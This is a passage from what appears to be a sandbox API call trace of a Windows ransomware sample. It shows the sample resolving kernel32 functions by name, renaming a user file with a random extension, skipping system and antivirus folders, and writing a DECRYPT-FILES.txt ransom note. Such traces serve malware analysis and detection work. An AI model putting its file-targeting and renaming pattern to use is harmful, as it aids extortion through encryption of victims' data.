lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.855] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.855] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.855] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.855] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.855] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.855] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.855] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.855] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.855] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.855] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.856] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.856] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.856] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.856] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.856] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.856] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.856] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.856] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.856] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.856] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.856] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.856] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.856] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.856] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.856] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.856] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.856] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.856] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.856] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.857] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.857] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.857] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.857] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.857] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.857] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.857] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.857] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.857] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.857] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.857] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.857] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.857] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.857] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.857] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.857] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.857] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.857] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.857] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.858] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.858] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.858] lstrlenA (lpString="DELETEATOM") returned 10 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.858] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.858] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.858] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.858] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.858] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.858] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.858] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.858] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.858] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.858] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.858] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.858] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.858] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.858] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.858] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.858] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.859] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.859] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.859] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.859] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.859] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.859] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.859] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.859] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.859] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.859] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.859] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.859] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.859] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.859] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.859] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.859] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.859] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.859] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.859] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.859] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.860] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.860] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.860] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.860] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.860] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.860] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.860] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.860] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.860] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms") returned 91 [0079.860] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.glYz") returned 96 [0079.860] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.glYz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.glyz"), dwFlags=0x0) returned 1 [0079.862] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.862] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.862] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.862] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0 [0079.862] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0079.862] CloseHandle (hObject=0x450) returned 1 [0079.863] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0079.863] lstrcmpW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0079.863] lstrcmpW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0079.863] lstrcatW (in: lpString1="Network Shortcuts", lpString2="\\" | out: lpString1="Network Shortcuts\\") returned="Network Shortcuts\\" [0079.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Network Shortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0079.863] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0079.863] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0079.864] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.864] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\jkbimi8.tmp") returned 94 [0079.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0079.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 82 [0079.864] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0079.864] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt") returned 100 [0079.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 